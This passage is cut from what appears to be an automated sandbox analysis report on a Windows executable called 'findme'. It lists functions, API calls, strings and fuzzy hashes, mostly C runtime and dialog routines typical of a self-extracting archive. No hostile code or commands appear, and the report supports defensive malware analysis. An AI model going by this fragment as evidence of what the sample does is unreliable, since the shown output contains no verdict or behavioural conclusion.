                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: CapsDevice$Release
                    • String ID:
                    • API String ID: 1035833867-0
                    • Opcode ID: af385953d26ddc4cd229d3edec3bd0370be398019a329a860ed5be33c9352da9
                    • Instruction ID: eefc9bee219c138edc8ae00e6c8f353f28eaa2f22f08e6e80b1db88f3d50df55
                    • Opcode Fuzzy Hash: af385953d26ddc4cd229d3edec3bd0370be398019a329a860ed5be33c9352da9
                    • Instruction Fuzzy Hash: 06E0EC35985622B7D7301BA4AC0DF9F3B54BF2A712F050015F60596290DA74440AEB94
                    Function 004E2016 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                    Download Yara Rule
                    APIs
                    • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 004E2016
                    • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 004E201B
                    • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 004E2020
                      • Part of subcall function 004E310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004E311F
                    • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 004E2035
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                    • String ID:
                    • API String ID: 1761009282-0
                    • Opcode ID: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                    • Instruction ID: 28097c3d4d2d1190754e6180e9d8a2cff707335343925f00329cf0dc7e05388e
                    • Opcode Fuzzy Hash: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                    • Instruction Fuzzy Hash: AFC002250046D1949C533EB3230A1BA47081B62B8FB9224CFAA80172839E8E070A943E
                    Function 004D9F5D Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 224COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004D9DF1: GetDC.USER32(00000000), ref: 004D9DF5
                      • Part of subcall function 004D9DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 004D9E00
                      • Part of subcall function 004D9DF1: ReleaseDC.USER32(00000000,00000000), ref: 004D9E0B
                    • GetObjectW.GDI32(?,00000018,?), ref: 004D9F8D
                      • Part of subcall function 004DA1E5: GetDC.USER32(00000000), ref: 004DA1EE
                      • Part of subcall function 004DA1E5: GetObjectW.GDI32(?,00000018,?), ref: 004DA21D
                      • Part of subcall function 004DA1E5: ReleaseDC.USER32(00000000,?), ref: 004DA2B5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: ObjectRelease$CapsDevice
                    • String ID: (
                    • API String ID: 1061551593-3887548279
                    • Opcode ID: 66fda91507767edf875b3df032a4a1aa734864029717e59248bd586420970eab
                    • Instruction ID: 5e703f1592c28c3c948dd64525f470ca7d99001a15dc0627d7504f3161dee473
                    • Opcode Fuzzy Hash: 66fda91507767edf875b3df032a4a1aa734864029717e59248bd586420970eab
                    • Instruction Fuzzy Hash: 87812271208204AFC714DF68C854A2ABBE9FF88704F00496EF98AD7260CB35AD15DB66
                    Function 004D0E37 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: _swprintf
                    • String ID: %ls$%s: %s
                    • API String ID: 589789837-2259941744
                    • Opcode ID: 253b93da86fd87e2faad9e4ef9ae9a0160f822691b13e480f58b5c11bd76b245
                    • Instruction ID: 372c1faf04b205b94324367a3b372dbce5947e8c0aa1c3f01ed9c676da70f356
                    • Opcode Fuzzy Hash: 253b93da86fd87e2faad9e4ef9ae9a0160f822691b13e480f58b5c11bd76b245
                    • Instruction Fuzzy Hash: 7351283568C300F9EA212BA5DC32F373755A709B04F24490FBB8B65BE1C6AD5491A61F
                    Function 004EA918 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                    Download Yara Rule
                    APIs
                    • _free.LIBCMT ref: 004EAA84
                      • Part of subcall function 004E8849: IsProcessorFeaturePresent.KERNEL32(00000017,004E8838,00000050,004F3958,?,004CCFE0,00000004,00500EE8,?,?,004E8845,00000000,00000000,00000000,00000000,00000000), ref: 004E884B
                      • Part of subcall function 004E8849: GetCurrentProcess.KERNEL32(C0000417,004F3958,00000050,00500EE8), ref: 004E886D
                      • Part of subcall function 004E8849: TerminateProcess.KERNEL32(00000000), ref: 004E8874
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                    • String ID: *?$.
                    • API String ID: 2667617558-3972193922
                    • Opcode ID: 46d45437bf881060891f947650aec9d3ba4d76883fc361421d2bb44ca5e48db8
                    • Instruction ID: ee24bf6b82bb1963dd74bdad2543bd75ffbda06d289f5afd342f5ee89e652c6d
                    • Opcode Fuzzy Hash: 46d45437bf881060891f947650aec9d3ba4d76883fc361421d2bb44ca5e48db8
                    • Instruction Fuzzy Hash: FD51E371D0024AAFDF14CFAAC8809AEB7B5FF58315F24806EE444E7301E639AE01CB55
                    Function 004C772B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138timeCOMMON
                    Download Yara Rule
                    APIs
                    • __EH_prolog.LIBCMT ref: 004C7730
                    • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 004C78CC
                      • Part of subcall function 004CA444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,004CA27A,?,?,?,004CA113,?,00000001,00000000,?,?), ref: 004CA458
                      • Part of subcall function 004CA444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,004CA27A,?,?,?,004CA113,?,00000001,00000000,?,?), ref: 004CA489
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: File$Attributes$H_prologTime
                    • String ID: :
                    • API String ID: 1861295151-336475711
                    • Opcode ID: 70ed5d09fd9db41bd6b0d62f24979a7f233c991dd7bb782fb5aab1e14e1c4818
                    • Instruction ID: ab9644fb97532f6f698629b21891e7ed3ff24448ce0cd294b8b27a0e65bcc51b
                    • Opcode Fuzzy Hash: 70ed5d09fd9db41bd6b0d62f24979a7f233c991dd7bb782fb5aab1e14e1c4818
                    • Instruction Fuzzy Hash: 11416379905118AADB64EB51CD59FEE737CAF41304F00809FB609A2192DB7C5F84CF69
                    Function 004CB66C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID:
                    • String ID: UNC$\\?\
                    • API String ID: 0-253988292
                    • Opcode ID: 17d1e93a6b26f752476b0d8f9f07d8c29f37ccadec4e4b5e7f1584368879c738
                    • Instruction ID: 2eef5e1e21feff9f52c6288204543d7eb7595230e0e8d5296132eaf3e538147d
                    • Opcode Fuzzy Hash: 17d1e93a6b26f752476b0d8f9f07d8c29f37ccadec4e4b5e7f1584368879c738
                    • Instruction Fuzzy Hash: 17419F39401259BACB60AE22DC46FEB77ADEF40394F10406FFC54A3252D77C9A54C6AC
                    Function 004D4230 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 127COMMON
                    Download Yara Rule
                    APIs
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004D43D8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: Exception@8Throw
                    • String ID: HCO$XCO
                    • API String ID: 2005118841-3375322268
                    • Opcode ID: 767e503b19a1dca721d0f3663435202864b6b44d947b4f286bd15f462664e371
                    • Instruction ID: b235b691357c50bf995bfcc06141ee42ea57bc7b7e82eb9961c4112c185794c9
                    • Opcode Fuzzy Hash: 767e503b19a1dca721d0f3663435202864b6b44d947b4f286bd15f462664e371
                    • Instruction Fuzzy Hash: 33417B706007008BD314DF69C8A1BAAB7E5FF98304F05482FE99AC7351EB7AE808CB45
                    Function 004D8FB6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 85COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID:
                    • String ID: Shell.Explorer$about:blank
                    • API String ID: 0-874089819
                    • Opcode ID: 8a8bdc2b8f08958c3bf3c82220d6ef6bae3db9cd4ba8d8c44204994fd677d004
                    • Instruction ID: 64ba4a81f4c74844e0f32aabe9bf757882e02c62dccb9c2db45369ab18e9fdd9
                    • Opcode Fuzzy Hash: 8a8bdc2b8f08958c3bf3c82220d6ef6bae3db9cd4ba8d8c44204994fd677d004
                    • Instruction Fuzzy Hash: 05218171204304AFCB05AF65D8A5A3A77A8FF44711B14856FF909CB382DA78EC01CB68
                    Function 004DD44D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70COMMON
                    Download Yara Rule
                    APIs
                    • DialogBoxParamW.USER32(GETPASSWORD1,00010434,004DA990,?,?), ref: 004DD4C5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: DialogParam
                    • String ID: GETPASSWORD1$xjQ
                    • API String ID: 665744214-1163178184
                    • Opcode ID: f780dc28075017827ed32293b9784c8b1345d5752c0abca22683da2422446e11
                    • Instruction ID: bdabadb6ae8e90283d9bfcbf43ae4f91d6664d1ed339cc425593c84cb2c77bb5
                    • Opcode Fuzzy Hash: f780dc28075017827ed32293b9784c8b1345d5752c0abca22683da2422446e11
                    • Instruction Fuzzy Hash: D2113B71600244BBDB21DE34DC06FBB37D8BB0A315F14416BBD49A7381C6B86C449768
                    Function 004CEBF2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004CEB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 004CEB92
                      • Part of subcall function 004CEB73: GetProcAddress.KERNEL32(005081C0,CryptUnprotectMemory), ref: 004CEBA2
                    • GetCurrentProcessId.KERNEL32(?,?,?,004CEBEC), ref: 004CEC84
                    Strings
                    • CryptProtectMemory failed, xrefs: 004CEC3B
                    • CryptUnprotectMemory failed, xrefs: 004CEC7C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AddressProc$CurrentProcess
                    • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                    • API String ID: 2190909847-396321323
                    • Opcode ID: 96bd4ad276cccd5480faa66d187bf92ba282bdeb9e504a014e80be669ff0ed7d
                    • Instruction ID: a514adcb4055b4fe657311f449019a774ad668f7f4be2f095e6373b1f243de7d
                    • Opcode Fuzzy Hash: 96bd4ad276cccd5480faa66d187bf92ba282bdeb9e504a014e80be669ff0ed7d
                    • Instruction Fuzzy Hash: 9B112135A01224ABDB149F26DC46F7F3B54AF04725B04802FE8056B381CB3DAE42D6DC
                    Function 004E9B90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: _free
                    • String ID: XO
                    • API String ID: 269201875-962008992
                    • Opcode ID: fd330b1a76028058564d5a23c31909c84cfefd7155f5167d51cfc4a147fd8c8a
                    • Instruction ID: 6a0ff27e3ab28c08356c7a5d673f6d029a496638faeb7e77a51a6618fbbb526c
                    • Opcode Fuzzy Hash: fd330b1a76028058564d5a23c31909c84cfefd7155f5167d51cfc4a147fd8c8a
                    • Instruction Fuzzy Hash: B811D675A00A519AEB309B3BAC41B173295BB72335F14032BF565CA2D0EB78DC47564C
                    Function 004DEC4A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004DF25E
                    • ___raise_securityfailure.LIBCMT ref: 004DF345
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: FeaturePresentProcessor___raise_securityfailure
                    • String ID: 8R
                    • API String ID: 3761405300-3857851311
                    • Opcode ID: 6173ca1196db8664c987c786ce7b91256c9c680eb955120f2b201a399e7ed13d
                    • Instruction ID: bdba4c84388c84464bd5855dbc2bb9a615536f6318f10ada3e0191d493669a16
                    • Opcode Fuzzy Hash: 6173ca1196db8664c987c786ce7b91256c9c680eb955120f2b201a399e7ed13d
                    • Instruction Fuzzy Hash: B92136B4512304CBD374DF55F9816107BA8BF2A310F11682AE5088B7F2D3B169CAEF49
                    Function 004D0889 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                    Download Yara Rule
                    APIs
                    • CreateThread.KERNEL32(00000000,00010000,004D09D0,?,00000000,00000000), ref: 004D08AD
                    • SetThreadPriority.KERNEL32(?,00000000), ref: 004D08F4
                      • Part of subcall function 004C6E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004C6EAF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: Thread$CreatePriority__vswprintf_c_l
                    • String ID: CreateThread failed
                    • API String ID: 2655393344-3849766595
                    • Opcode ID: 6d5616bda7861fbabdef447104f864e6375aa2c16b82a9fbea98edf298bb0240
                    • Instruction ID: 36b5da4e518ea0cb182d1f0130e724cc0ff77d5b21faf291909ceca3602dead7
                    • Opcode Fuzzy Hash: 6d5616bda7861fbabdef447104f864e6375aa2c16b82a9fbea98edf298bb0240
                    • Instruction Fuzzy Hash: B801F9B53443066FE6206F54EC91FBB7798EB41756F20043FF686532C0CEA5A840E66C
                    Function 004EB2AE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004E8FA5: GetLastError.KERNEL32(?,00500EE8,004E3E14,00500EE8,?,?,004E3713,00000050,?,00500EE8,00000200), ref: 004E8FA9
                      • Part of subcall function 004E8FA5: _free.LIBCMT ref: 004E8FDC
                      • Part of subcall function 004E8FA5: SetLastError.KERNEL32(00000000,?,00500EE8,00000200), ref: 004E901D
                      • Part of subcall function 004E8FA5: _abort.LIBCMT ref: 004E9023
                    • _abort.LIBCMT ref: 004EB2E0
                    • _free.LIBCMT ref: 004EB314
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: ErrorLast_abort_free
                    • String ID: O
                    • API String ID: 289325740-4042636462
                    • Opcode ID: 3d4aae6c804288d18ee4b5eeff8acb084efaf9342e029a32631b1a09af5ce108
                    • Instruction ID: 4c6198b84c3e764c407816f4ef8769121fe5f0d56bc0fd49ef1607c10128a2cf
                    • Opcode Fuzzy Hash: 3d4aae6c804288d18ee4b5eeff8acb084efaf9342e029a32631b1a09af5ce108
                    • Instruction Fuzzy Hash: 12016531D016669BC721AF5B980226FB361FF04723B19051FE96467791CB386951CBCE
                    Function 004C130B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004CDA98: _swprintf.LIBCMT ref: 004CDABE
                      • Part of subcall function 004CDA98: _strlen.LIBCMT ref: 004CDADF
                      • Part of subcall function 004CDA98: SetDlgItemTextW.USER32(?,004FE154,?), ref: 004CDB3F
                      • Part of subcall function 004CDA98: GetWindowRect.USER32(?,?), ref: 004CDB79
                      • Part of subcall function 004CDA98: GetClientRect.USER32(?,?), ref: 004CDB85
                    • GetDlgItem.USER32(00000000,00003021), ref: 004C134F
                    • SetWindowTextW.USER32(00000000,004F35B4), ref: 004C1365
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: ItemRectTextWindow$Client_strlen_swprintf
                    • String ID: 0
                    • API String ID: 2622349952-4108050209
                    • Opcode ID: 4b1c34624e37e6a32e9619082a833602dd3ab13b1a42b8880dd04fd743f54426
                    • Instruction ID: 5304c9097caacd85110aa4ac9afeef26c1f1813e7d3f3b597d03df7ec6d327f2
                    • Opcode Fuzzy Hash: 4b1c34624e37e6a32e9619082a833602dd3ab13b1a42b8880dd04fd743f54426
                    • Instruction Fuzzy Hash: AFF0813810028CA6EF650F61C909FAA3B98BF22309F08801EBD45947B2C77DC5A5EA94
                    Function 004D084E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                    Download Yara Rule
                    APIs
                    • WaitForSingleObject.KERNEL32(?,000000FF,004D0A78,?), ref: 004D0854
